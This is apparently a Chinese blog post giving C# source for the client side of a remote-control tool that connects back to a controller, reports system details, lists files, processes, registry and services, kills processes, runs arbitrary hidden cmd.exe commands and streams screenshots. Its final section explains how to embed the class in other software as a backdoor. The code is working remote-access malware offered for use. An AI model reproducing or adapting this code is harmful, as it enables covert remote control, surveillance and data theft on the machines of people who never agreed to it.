• c#编写远程控制的核心被控端操作类


    首先定义一个全局,上线地址,上线端口等
    
    using Control_Client; 
    using Microsoft.Win32; 
    using System; 
    using System.Collections.Generic; 
    using System.Diagnostics; 
    using System.Drawing; 
    using System.IO; 
    using System.Management; 
    using System.Net; 
    using System.Net.Sockets; 
    using System.Text; 
    using System.Threading; 
    using System.Windows.Forms; 
      
      
    class BD 
    { 
        public static TcpClient Client; 
        public static TcpListener Lis; 
        public static NetworkStream Stream; 
        public static Socket socket; 
        public static Socket Lis_socket; 
        public static String LocalDisk_List = "$GetDir||";                     //电脑盘符命令,初始化命令头 
        public static String Online_Order = "$Online||";                     //上线命令,初始化命令头部 
        public static String Folder_List = "$GetFolder||";                  //列举子文件夹命令,初始化命令头 
        public static String File_List = "$GetFile||";                    //列举文件命令,初始化命令头 
        public static String Process_List = "$GetProcess||";                 //列举文件命令,初始化命令头 
        public static String RegName_List = "$GetRegisterRoot||";            //列举注册表子项名命令,初始化命令头 
        public static String RegNameValues_List = "$GetRegisterRootValues||";      //列举注册表子项值命令,初始化命令头 
        public static String CMD_List = "$ActiveDos||";                  //保存DOS命令执行后的结果 
        public static String Service_List = "$GetService||";                 //保存系统服务列表 
        public static Process CMD = new Process();                                 //用于执行DOS命令 
        public static bool _IsStop_Catching_Desktop = false;                       //此标识为用于判断是否停止对于屏幕的获取 
        public static UdpClient UDP_Client = new UdpClient(); 
        public delegate void Pt(); 
        /// <summary> 
        /// 此方法用于向主控端发送上线请求  
        /// 命令原型 : $Online||软件版本||计算机名||客户注释||操作系统||CPU频率||内存容量 
        /// </summary> 
        public static void Post_Online_Message() 
        { 
            Client = new TcpClient(); 
            //尝试连接 
               
                Client.Connect(Globle.Host, Globle.Port); 
              
            //如果连接上了 
            if (Client.Connected) 
            { 
                //得到套接字原型 
                socket = Client.Client; 
                Stream = new NetworkStream(socket); 
                //发送上线请求 
                Stream.Write(Encoding.Default.GetBytes(Online_Order), 0, Encoding.Default.GetBytes(Online_Order).Length); 
                Stream.Flush(); 
                //如果请求发出后套接字仍然处于连接状态 
                //则单劈出一个线程,用于接收命令 
                if (socket.Connected) 
                { 
                    Thread thread = new Thread(new ThreadStart(Get_Server_Order)); 
                    thread.Start(); 
                } 
            } 
        } 
      
        /// <summary> 
        /// 此方法通过Windows WMI 服务 
        /// 进行计算机硬件软件信息的收集 
        /// </summary> 
        public static void Get_ComputerInfo() 
        { 
            //查询计算机名 
            Online_Order += WMI_Searcher("SELECT * FROM Win32_ComputerSystem", "Caption") + "||"; 
            //查询备注 
            Online_Order += Globle.Customer + "||"; 
            //查询操作系统 
            Online_Order += WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "Caption") + "||"; 
            //查询CPU 
            Online_Order += WMI_Searcher("SELECT * FROM Win32_Processor", "Caption") + "||"; 
            //查询内存容量 - 单位: MB 
            Online_Order += (int.Parse(WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "TotalVisibleMemorySize")) / 1024) + " MB||"; 
        } 
      
      
        #region WMI 操作相关及扩展 
      
        /// <summary> 
        /// 此方法根据指定语句通过WMI查询用户指定内容 
        /// 并且返回 
        /// </summary> 
        /// <param name="QueryString"></param> 
        /// <param name="Item_Name"></param> 
        /// <returns></returns> 
        public static String WMI_Searcher(String QueryString, String Item_Name) 
        { 
            String Result = ""; 
            ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString); 
            ManagementObjectCollection MOC = MOS.Get(); 
            foreach (ManagementObject MOB in MOC) 
            { 
                Result = MOB[Item_Name].ToString(); 
                break; 
            } 
            MOC.Dispose(); 
            MOS.Dispose(); 
            return Result; 
        } 
      
        /// <summary> 
        /// 此方法根据指定语句通过WMI查询用户指定内容 
        /// 并且返回 
        /// </summary> 
        /// <param name="QueryString"></param> 
        /// <param name="Item_Name"></param> 
        /// <returns></returns> 
        public static String WMI_Searcher_Service_Ex(String QueryString) 
        { 
            String Result = ""; 
            ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString); 
            ManagementObjectCollection MOC = MOS.Get(); 
            foreach (ManagementObject MOB in MOC) 
            { 
                try
                { 
                    Result += MOB["Caption"].ToString() + ","; 
                    if (MOB["Started"].ToString() == "True") 
                    { 
                        Result += "启动中" + ","; 
                    } 
                    else
                    { 
                        Result += "停止中" + ","; 
                    } 
      
                    Result += MOB["Description"].ToString() + "||"; 
                } 
                catch (Exception ex) 
                { }; 
            } 
            MOC.Dispose(); 
            MOS.Dispose(); 
            return Result; 
        } 
      
        #endregion 
      
        #region 命令处理函数 
      
        /// <summary> 
        /// 此方法用于判断命令结构 
        /// 根据不同的命令调用不同的方法进行处理 
        /// </summary> 
        /// <param name="Order_Set"></param> 
        public static void Order_Catcher(String[] Order_Set) 
        { 
            switch (Order_Set[0]) 
            { 
                //此命令头表示客户端状态结果返回 
                case "$Return": 
                    switch (Order_Set[1]) 
                    { 
                        //如果是上线成功 
                        case "#Online_OK": 
                            Online_OK(); 
                            break; 
                    } 
                    break; 
                //此命令头表示客户端请求本机所有盘符 
                case "$GetDir": 
                    Get_LocalDisk(); 
                    break; 
                //此命令头表示客户端请求本机指定目录下的所有文件夹 
                case "$GetFolder": 
                    Get_Foloder(Order_Set[1]); 
                    break; 
                //此命令头表示客户端请求本机指定目录下的所有文件 
                case "$GetFile": 
                    Get_File(Order_Set[1]); 
                    break; 
                //此命令头表示客户端请求本机当前所有进程 
                case "$GetProcess": 
                    Get_Process(); 
                    break; 
                //此命令头表示客户端请求杀死本机指定进程 
                case "$KillProcess": 
                    Kill_Process(Order_Set[1]); 
                    break; 
                //此命令头表示客户端请求列举本地注册表根目录 
                case "$GetRegisterRoot": 
                    Get_RegRoot(Order_Set[1], Order_Set[2]); 
                    break; 
                //此命令头表示客户端请求列举本地注册表指定项的所有值 
                case "$GetRegisterRootValues": 
                    Get_RegRootValues(Order_Set[1], Order_Set[2]); 
                    break; 
                //此命令头表示客户端请求激活本地DOS 
                case "$ActiveDos": 
                    ActiveDos(); 
                    break; 
                //此命令头表示客户端请求执行本地DOS命令 
                case "$ExecuteCommand": 
                    Execute_Command(Order_Set[1]); 
                    break; 
                //此命令头表示客户端请求列举本机系统服务列表 
                case "$GetService": 
                    GetService(); 
                    break; 
                //此命令头表示客户端请求激活本机屏幕HDC 
                case "$ActiveHDC": 
                    try
                    { 
                        //得到进程列表后,尝试发送 
                        using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                        { 
                            Ns.Write(Encoding.Default.GetBytes("$ActiveHDC||True"), 0, Encoding.Default.GetBytes("$ActiveHDC||True").Length); 
                            Ns.Flush(); 
                        } 
                        UDP_Client.Connect(Globle.Host, Globle.UDP_Port); 
                        //如果连接上了 
                        if (UDP_Client.Client.Connected) 
                        { 
                            //新建线程进行发送桌面信息 
                            //Thread thread = new Thread(new ThreadStart(Catching_Desktop)); 
                            //thread.Start(); 
                            //   BeginInvoke(new Pt(Active_Timer)); 
                        } 
                    } 
                    catch (Exception ex) 
                    { 
                        MessageBox.Show("尝试发送激活HDC信息失败 : " + ex.Message); 
                    } 
                    break; 
            } 
        } 
      
      
        #endregion 
      
        #region 上线成功后操作函数 
      
        /// <summary> 
        /// 此方法用于上线成功后的用户提示 
        /// </summary> 
        public static void Online_OK() 
        { 
            //    Sys_Icon.ShowBalloonTip(5000, "上线成功", "成功连接到主控端!", ToolTipIcon.Info); 
        } 
      
        #endregion 
      
        #region  窗体关闭动作 
      
        /// <summary> 
        /// 此事件用于窗体关闭时消除所有正在运行的线程 
        /// </summary> 
        /// <param name="sender"></param> 
        /// <param name="e"></param> 
        private void Main_Form_FormClosing(object sender, FormClosingEventArgs e) 
        { 
            //下线命令 原型 : $OffLine|| 
            String Order = "$OffLine||"; 
            try
            { 
                //尝试发送下线请求 
                Stream.Write(Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()), 0, Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()).Length); 
                Stream.Flush(); 
            } 
            catch (Exception ex) 
            { }; 
            Environment.Exit(0); 
        } 
      
        #endregion 
      
        #region 枚举硬盘 - 监听自身端口相关操作 
      
        /// <summary> 
        /// 此方法调用Windows WMI 
        /// 列举当前电脑所有盘符 
        /// </summary> 
        public static void Get_LocalDisk() 
        { 
            LocalDisk_List = "$GetDir||"; 
            ManagementObjectSearcher MOS = new ManagementObjectSearcher("SELECT * FROM Win32_LogicalDisk"); 
            ManagementObjectCollection MOC = MOS.Get(); 
            foreach (ManagementObject MOB in MOC) 
            { 
                LocalDisk_List += MOB["Description"].ToString() + "#" + MOB["Caption"].ToString() + ","; 
            } 
            MOC.Dispose(); 
            MOS.Dispose(); 
      
            try
            { 
                //得到硬盘分区列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(LocalDisk_List), 0, Encoding.Default.GetBytes(LocalDisk_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送硬盘分区列表失败 : " + ex.Message); 
            } 
        } 
      
        /// <summary> 
        /// 此方法用于监听上线端口 
        /// </summary> 
        public static void Listen_Port() 
        { 
            while (Globle._IsListen_Port) 
            { 
                Lis_socket = Lis.AcceptSocket();  //如果有客户端请求则创建套接字 
                Thread thread = new Thread(new ThreadStart(Res_Message)); 
                thread.Start(); 
            } 
        } 
      
        #endregion 
      
        #region 文件夹 - 文件枚举操作 
      
        /// <summary> 
        /// 此方法用于根据指定盘符列举子文件夹 
        /// </summary> 
        /// <param name="Path"></param> 
        public static void Get_Foloder(String Path) 
        { 
            Folder_List = "$GetFolder||"; 
            //得到指定盘符的所有子文件夹 
            String[] Folder = Directory.GetDirectories(Path); 
            for (int i = 0; i < Folder.Length; i++) 
            { 
                Folder_List += Folder[i] + ","; 
            } 
      
            try
            { 
                //得到文件夹列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(Folder_List), 0, Encoding.Default.GetBytes(Folder_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送文件夹列表失败 : " + ex.Message); 
            } 
        } 
      
        /// <summary> 
        /// 此方法用于根据指定盘符列举子所有文件 
        /// </summary> 
        /// <param name="Path"></param> 
        public static void Get_File(String Path) 
        { 
            File_List = "$GetFile||"; 
            //得到文件目标文件夹文件数组 
            String[] Result_List = Directory.GetFiles(Path); 
            //通过拆分得到结果字符串 
            for (int i = 0; i < Result_List.Length; i++) 
            { 
                File_List += Result_List[i] + ","; 
            } 
      
            try
            { 
                //得到文件列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(File_List), 0, Encoding.Default.GetBytes(File_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送文件夹列表失败 : " + ex.Message); 
            } 
        } 
      
        #endregion 
      
        #region 循环接收命令机制 
      
        /// <summary> 
        /// 此方法用于得到主控端发来的命令集合 
        /// </summary> 
        public static void Get_Server_Order() 
        { 
            while (Globle._IsResvice_Message) 
            { 
                try
                { 
                    byte[] bb = new byte[1024]; 
                    //接收命令 
                    int Order_Len = Stream.Read(bb, 0, bb.Length); 
                    //得到主控端发来的命令集合 
                    String[] Order_Set = Encoding.Default.GetString(bb, 0, Order_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries); 
                    Order_Catcher(Order_Set); 
                } 
                catch (Exception ex) 
                { }; 
            } 
        } 
      
        /// <summary> 
        /// 此方法负责接收主控端命令 
        /// 并且传递到处理方法种 
        /// </summary> 
        public static void Res_Message() 
        { 
            while (Globle._IsResvice_Message) 
            { 
                try
                { 
                    using (NetworkStream ns = new NetworkStream(Lis_socket)) 
                    { 
                        try
                        { 
                            byte[] bb = new byte[1024]; 
                            //得到命令 
                            int Res_Len = ns.Read(bb, 0, bb.Length); 
                            //得到完整命令分割后的数组结构 
                            String[] Order_Set = Encoding.Default.GetString(bb, 0, Res_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries); 
                            //调用判断命令函数 
                            //MessageBox.Show(Order_Set[0]); 
                            Order_Catcher(Order_Set); 
                        } 
                        catch (Exception ex) { }; 
                    } 
                } 
                catch (Exception ex) 
                { }; 
            } 
        } 
      
        #endregion 
      
        #region 系统进程相关操作 
      
        /// <summary> 
        /// 此方法负责列举当前系统所有进程 
        /// 并且拼接结果字符串发送给主控端 
        /// </summary> 
        public static void Get_Process() 
        { 
            Process_List = "$GetProcess||"; 
            Process[] process = Process.GetProcesses(); 
            for (int i = 0; i < process.Length; i++) 
            { 
                try
                { 
                    if (process[i].ProcessName != "") 
                    { 
                        //拼接字符串 
                        Process_List += process[i].ProcessName + "," + process[i].Handle.ToString() + "," + process[i].Id + "||"; 
                    } 
                } 
                catch (Exception ex) 
                { }; 
            } 
            try
            { 
                //得到进程列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(Process_List), 0, Encoding.Default.GetBytes(Process_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送进程列表失败 : " + ex.Message); 
            } 
        } 
      
        /// <summary> 
        /// 此方法根据指定的进程名杀死进程 
        /// 如果结束进程成功 则返回 $KillProcess||True 
        /// 否则返回 $KillProcess||False 
        /// </summary> 
        /// <param name="Process_Name"></param> 
        public static void Kill_Process(String Process_Name) 
        { 
            bool isKilled = false; 
            Process[] Process_Set = Process.GetProcesses(); 
            //遍历所有进程,找到指定进程后杀死 
            for (int i = 0; i < Process_Set.Length; i++) 
            { 
                try
                { 
                    if (Process_Set[i].ProcessName == Process_Name) 
                    { 
                        //如果找到进程则尝试杀死该进程 
                        Process_Set[i].Kill(); 
                        //杀死成功后 ,改变标志位,跳出FOR循环发送回应命令 
                        isKilled = true; 
                        break; 
                    } 
                } 
                catch (Exception ex) 
                { }; 
            } 
      
            //得到结果后判断标志位 
            using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
            { 
                //如果成功杀死了 
                if (isKilled) 
                { 
                    Ns.Write(Encoding.Default.GetBytes("$KillProcess||True"), 0, Encoding.Default.GetBytes("$KillProcess||True").Length); 
                    Ns.Flush(); 
                } 
                else
                { 
                    Ns.Write(Encoding.Default.GetBytes("$KillProcess||False"), 0, Encoding.Default.GetBytes("$KillProcess||False").Length); 
                    Ns.Flush(); 
                } 
            } 
        } 
      
        #endregion 
      
        #region 注册表操作相关 
      
        /// <summary> 
        /// 此方法用于得到当前系统注册表根目录名字并且发送 
        /// </summary> 
        public static void Get_RegRoot(String Key_Model, String Key_Path) 
        { 
            RegName_List = "$GetRegisterRoot||"; 
            //新建数组结构体用来接收得到的子项名集合 
            String[] Reg_Name_Set = Get_Register_Root_Names(Key_Model, Key_Path); 
            for (int i = 0; i < Reg_Name_Set.Length; i++) 
            { 
                //拼接结果字符串 
                RegName_List += Reg_Name_Set[i] + "||"; 
            } 
            try
            { 
                //得到进程列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(RegName_List), 0, Encoding.Default.GetBytes(RegName_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送注册表子项列表失败 : " + ex.Message); 
            } 
        } 
      
        /// <summary> 
        /// 此方法根据指定的注册表项路径 
        /// 查找所属下的所有子项名称 
        /// 并且返回数组名称结构体 
        /// </summary> 
        /// <param name="Key_Model"></param> 
        /// <param name="Key_Path"></param> 
        /// <returns></returns> 
        public static String[] Get_Register_Root_Names(String Key_Model, String Key_Path) 
        { 
            //新建数组,用来储存子项名字集合 
            String[] Names = null; 
            //如果是检索根键值 
            if (Key_Path == "******%None%******") 
            { 
                //判断键值路径所属的根键 
                switch (Key_Model) 
                { 
                    //如果是HKEY_CLASSES_ROOT下面的 
                    case "HKEY_CLASSES_ROOT": 
                        Names = Registry.ClassesRoot.GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_CURRENT_CONFIG下面的 
                    case "HKEY_CURRENT_CONFIG": 
                        Names = Registry.CurrentConfig.GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_CURRENT_USER下面的 
                    case "HKEY_CURRENT_USER": 
                        Names = Registry.CurrentUser.GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_LOCAL_MACHINE下面的 
                    case "HKEY_LOCAL_MACHINE": 
                        Names = Registry.LocalMachine.GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_USERS下面的 
                    case "HKEY_USERS": 
                        Names = Registry.Users.GetSubKeyNames(); 
                        break; 
                } 
            } 
            //如果是检索根键值下面的子项 
            else
            { 
                //判断键值路径所属的根键 
                switch (Key_Model) 
                { 
                    //如果是HKEY_CLASSES_ROOT下面的 
                    case "HKEY_CLASSES_ROOT": 
                        Names = Registry.ClassesRoot.OpenSubKey(Key_Path).GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_CURRENT_CONFIG下面的 
                    case "HKEY_CURRENT_CONFIG": 
                        Names = Registry.CurrentConfig.OpenSubKey(Key_Path).GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_CURRENT_USER下面的 
                    case "HKEY_CURRENT_USER": 
                        Names = Registry.CurrentUser.OpenSubKey(Key_Path).GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_LOCAL_MACHINE下面的 
                    case "HKEY_LOCAL_MACHINE": 
                        Names = Registry.LocalMachine.OpenSubKey(Key_Path).GetSubKeyNames(); 
                        break; 
                    //如果是HKEY_USERS下面的 
                    case "HKEY_USERS": 
                        Names = Registry.Users.OpenSubKey(Key_Path).GetSubKeyNames(); 
                        break; 
                } 
            } 
      
            //返回目录名集合 
            return Names; 
        } 
      
        /// <summary> 
        /// 此方法用于得到当前系统注册表根目录子项所有值并且发送 
        /// </summary> 
        public static void Get_RegRootValues(String Key_Model, String Key_Path) 
        { 
            RegNameValues_List = "$GetRegisterRootValues||"; 
            //新建数组结构体用来接收得到的子项名集合 
            RegNameValues_List += Get_Register_Root_Values(Key_Model, Key_Path); 
            try
            { 
                //得到进程列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    Ns.Write(Encoding.Default.GetBytes(RegNameValues_List), 0, Encoding.Default.GetBytes(RegNameValues_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发送注册表子项值列表失败 : " + ex.Message); 
            } 
        } 
      
        /// <summary> 
        /// 此方法根据指定的注册表项路径 
        /// 查找所属下的所有值名称 
        /// 并且返回数组名称结构体 
        /// </summary> 
        /// <param name="Key_Model"></param> 
        /// <param name="Key_Path"></param> 
        /// <returns></returns> 
        public static String Get_Register_Root_Values(String Key_Model, String Key_Path) 
        { 
            //新建数组,用来储存子项名字集合 
            String Result_List = ""; 
            //如果是检索根键值 
            if (Key_Path == "******%None%******") 
            { 
                //判断键值路径所属的根键 
                switch (Key_Model) 
                { 
                    //如果是HKEY_CLASSES_ROOT下面的 
                    case "HKEY_CLASSES_ROOT": 
                        using (RegistryKey RK = Registry.ClassesRoot) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_CURRENT_CONFIG下面的 
                    case "HKEY_CURRENT_CONFIG": 
                        using (RegistryKey RK = Registry.CurrentConfig) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_CURRENT_USER下面的 
                    case "HKEY_CURRENT_USER": 
                        using (RegistryKey RK = Registry.CurrentUser) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_LOCAL_MACHINE下面的 
                    case "HKEY_LOCAL_MACHINE": 
                        using (RegistryKey RK = Registry.LocalMachine) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_USERS下面的 
                    case "HKEY_USERS": 
                        using (RegistryKey RK = Registry.Users) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                } 
            } 
            //如果是检索根键值下面的子项 
            else
            { 
                //判断键值路径所属的根键 
                switch (Key_Model) 
                { 
                    //如果是HKEY_CLASSES_ROOT下面的 
                    case "HKEY_CLASSES_ROOT": 
                        using (RegistryKey RK = Registry.ClassesRoot.OpenSubKey(Key_Path)) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_CURRENT_CONFIG下面的 
                    case "HKEY_CURRENT_CONFIG": 
                        using (RegistryKey RK = Registry.CurrentConfig.OpenSubKey(Key_Path)) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_CURRENT_USER下面的 
                    case "HKEY_CURRENT_USER": 
                        using (RegistryKey RK = Registry.CurrentUser.OpenSubKey(Key_Path)) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_LOCAL_MACHINE下面的 
                    case "HKEY_LOCAL_MACHINE": 
                        using (RegistryKey RK = Registry.LocalMachine.OpenSubKey(Key_Path)) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                    //如果是HKEY_USERS下面的 
                    case "HKEY_USERS": 
                        using (RegistryKey RK = Registry.Users.OpenSubKey(Key_Path)) 
                        { 
                            foreach (String VName in RK.GetValueNames()) 
                            { 
                                Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; 
                            } 
                        } 
                        break; 
                } 
            } 
      
            //返回目录名集合 
            return Result_List; 
        } 
      
        #endregion 
      
        #region 系统DOS相关操作 
      
        /// <summary> 
        /// 此方法用于激活本地DOS 
        /// 首先查找是否存在DOS的可执行文件 
        /// 如果不存在则返回错误信息 
        /// 存在则返回DOS欢迎初始化信息 
        /// </summary> 
        public static void ActiveDos() 
        { 
            //如果不存在文件 
            if (!File.Exists("C:\Windows\System32\cmd.exe")) 
            { 
                try
                { 
                    //得到进程列表后,尝试发送 
                    using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                    { 
                        //DOS文件不存在命令 原型 : $ActiveDos|| [参数1] 
                        Ns.Write(Encoding.Default.GetBytes(CMD_List + "Error"), 0, Encoding.Default.GetBytes(CMD_List + "Error").Length); 
                        Ns.Flush(); 
                    } 
                } 
                catch (Exception ex) 
                { 
                    MessageBox.Show("尝试发不存在DOS信息失败 : " + ex.Message); 
                } 
            } 
            //如果存在 
            else
            { 
                String Result = Get_Message_Command(""); 
                try
                { 
                    //得到进程列表后,尝试发送 
                    using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                    { 
                        //DOS文件存在命令 原型 : $ActiveDos|| 欢迎信息 
                        Ns.Write(Encoding.Default.GetBytes(CMD_List + Result), 0, Encoding.Default.GetBytes(CMD_List + Result).Length); 
                        Ns.Flush(); 
                    } 
                } 
                catch (Exception ex) 
                { 
                    MessageBox.Show("尝试发不存在DOS信息失败 : " + ex.Message); 
                } 
            } 
        } 
      
        /// <summary> 
        /// 此方法用于获得执行命令后的结果 
        /// 并发送给主控端 
        /// </summary> 
        /// <param name="Order"></param> 
        public static void Execute_Command(String Order) 
        { 
            String Result = "$ExecuteCommand||" + Get_Message_Command("/c " + Order); 
            try
            { 
                //得到进程列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    //DOS文件存在命令 原型 : $ExecuteCommand || 命令执行结果 
                    Ns.Write(Encoding.Default.GetBytes(Result), 0, Encoding.Default.GetBytes(Result).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发不存在DOS执行结果失败 : " + ex.Message); 
            } 
        } 
      
      
        /// <summary> 
        /// 此方法用于将指定DOS命令执行后返回结果 
        /// </summary> 
        /// <param name="Command"></param> 
        /// <returns></returns> 
        public static String Get_Message_Command(String Command) 
        { 
            CMD.StartInfo.FileName = "cmd.exe"; 
            CMD.StartInfo.Arguments = Command; 
            CMD.StartInfo.RedirectStandardError = true; 
            CMD.StartInfo.RedirectStandardOutput = true; 
            CMD.StartInfo.UseShellExecute = false; 
            CMD.StartInfo.CreateNoWindow = true; 
            CMD.Start(); 
            String Message_Line = ""; 
            String Result = ""; 
            using (StreamReader Reader = CMD.StandardOutput) 
            { 
                //循环读取结果 
                while ((Message_Line = Reader.ReadLine()) != null) 
                { 
                    Result += Message_Line + "
    "; 
                } 
            } 
            return Result; 
      
        } 
      
        #endregion 
      
        #region 系统服务相关操作 
      
        /// <summary> 
        /// 此服务用于将得到的所有系统服务列表 
        /// 发送到主控端 
        /// </summary> 
        public static void GetService() 
        { 
            String Result_List = Service_List + WMI_Searcher_Service_Ex("SELECT * FROM Win32_Service"); 
            try
            { 
                //得到进程列表后,尝试发送 
                using (NetworkStream Ns = new NetworkStream(Lis_socket)) 
                { 
                    //DOS文件存在命令 原型 : $ExecuteCommand || 命令执行结果 
                    Ns.Write(Encoding.Default.GetBytes(Result_List), 0, Encoding.Default.GetBytes(Result_List).Length); 
                    Ns.Flush(); 
                } 
            } 
            catch (Exception ex) 
            { 
                MessageBox.Show("尝试发系统服务列表失败 : " + ex.Message); 
            } 
        } 
      
        #endregion 
      
        #region 远程桌面监控相关操作 
      
        /// <summary> 
        /// 此方法用于根据标志位不停的抓取屏幕图像  
        /// 并且传送给主控端 
        /// </summary> 
        public static void Catching_Desktop() 
        { 
            while (!_IsStop_Catching_Desktop) 
            { 
                //创建一个跟屏幕大小一样的Image 
                Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height); 
                //创建GDI+ 用来DRAW屏幕 
                Graphics g = Graphics.FromImage(img); 
                //将屏幕打入到Image中 
                g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size); 
                //得到屏幕HDC句柄  
                IntPtr HDC = g.GetHdc(); 
                //截图后释放该句柄 
                g.ReleaseHdc(HDC); 
      
                MemoryStream Ms = new MemoryStream(); 
                //将图像打入流 
                img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg); 
                Send_Desktop_Image_Info(Ms); 
            } 
        } 
      
        public static void Send_Desktop_Image_Info(MemoryStream Ms) 
        { 
            int Len = 0; 
            byte[] bb = new byte[4096]; 
            Ms.Position = 0; 
            while ((Len = Ms.Read(bb, 0, bb.Length)) > 0) 
            { 
                UDP_Client.Send(bb, bb.Length); 
            } 
            //发送结尾符 
            UDP_Client.Send(Encoding.Default.GetBytes("**End**"), Encoding.Default.GetBytes("**End**").Length); 
        } 
      
        private void Desktop_Timer_Tick(object sender, EventArgs e) 
        { 
            if (!_IsStop_Catching_Desktop) 
            { 
                //创建一个跟屏幕大小一样的Image 
                Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height); 
                //创建GDI+ 用来DRAW屏幕 
                Graphics g = Graphics.FromImage(img); 
                //将屏幕打入到Image中 
                g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size); 
                //得到屏幕HDC句柄  
                IntPtr HDC = g.GetHdc(); 
                //截图后释放该句柄 
                g.ReleaseHdc(HDC); 
      
                MemoryStream Ms = new MemoryStream(); 
                //将图像打入流 
                img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg); 
                Send_Desktop_Image_Info(Ms); 
            } 
        } 
      
        /// <summary> 
        /// 此方法用于将TIMER启动 
        /// 调用方式 : [委托] 
        /// </summary> 
        public static void Active_Timer() 
        { 
            // Desktop_Timer.Enabled = true; 
        } 
      
        #endregion 
    }

    直接在软件中做为后门的使用办法:

    BD.Online_Order += Globle.Software + "||"; 
    //调用WMI收集系统信息 
    BD.Get_ComputerInfo(); 
    //发送上线请求 - [多线程] 
    Thread thread = new Thread(new ThreadStart(BD.Post_Online_Message)); 
    thread.Start(); 
    //自身监听端口 - [多线程] 
    BD.Lis = new TcpListener(Globle.Lis_Port); 
    BD.Lis.Start();  //一直监听 
    Thread thread_Lis_MySelf = new Thread(new ThreadStart(BD.Listen_Port)); 
    thread_Lis_MySelf.Start();

    这样就启动了。

  • 相关阅读:
    Git远程操作
    696. Count Binary Substrings
    693. Binary Number with Alternating Bits
    821. Shortest Distance to a Character
    345. Reverse Vowels of a String
    89. Gray Code
    数组操作符重载
    C++字符串反转
    马克思的两面性-来自网友
    C++字符串
  • 原文地址:https://www.cnblogs.com/rinack/p/3257231.html
Copyright © 2020-2023  润新知